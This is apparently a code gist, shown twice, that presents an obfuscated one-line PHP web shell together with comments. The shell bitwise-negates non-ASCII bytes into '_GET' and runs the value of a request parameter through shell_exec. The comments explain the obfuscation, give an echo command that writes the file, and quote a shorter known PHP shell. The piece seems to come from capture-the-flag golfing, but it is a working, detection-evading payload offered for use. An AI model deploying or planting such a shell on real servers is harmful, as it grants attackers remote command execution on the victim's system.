terjanq/rev_shell.php

## rev_shell.php
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;

/*
 *   In terminal:
 *       $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
 *   This is how the code will be produced, \xa0\xb8\xba\xab will be
 *   treated as constant therefore no " needed. It is also not copyable
 *   string because of non-ascii characters
 *
 *   Explanation:
 *      - ~"\xa0\xb8\xba\xab" <-> "_GET"
 *      - ${"_GET"}["\xa0"] <-> $_GET["\xa0"]
 *      - `{$_GET["\xa0"]}` <-> shell_exec($_GET["\xa0"])
 *
 *   This is only 5 bytes longer than the shortest PHP shell (using $_GET to smuggle data)!
 *   <?=`$_GET[_]`;
 *
 *   This is a slightly improved idea that I had 2 years ago
 *   https://github.com/terjanq/Flag-Capture/blob/master/MeePwn%202018/omega/README.md#part2
 */
	<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;

	/*
	* In terminal:
	* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
	* This is how the code will be produced, \xa0\xb8\xba\xab will be
	* treated as constant therefore no " needed. It is also not copyable
	* string because of non-ascii characters
	*
	* Explanation:
	* - ~"\xa0\xb8\xba\xab" <-> "_GET"
	* - ${"_GET"}["\xa0"] <-> $_GET["\xa0"]
	* - `{$_GET["\xa0"]}` <-> shell_exec($_GET["\xa0"])
	*
	* This is only 5 bytes longer than the shortest PHP shell (using $_GET to smuggle data)!
	* <?=`$_GET[_]`;
	*
	* This is a slightly improved idea that I had 2 years ago
	* https://github.com/terjanq/Flag-Capture/blob/master/MeePwn%202018/omega/README.md#part2
	*/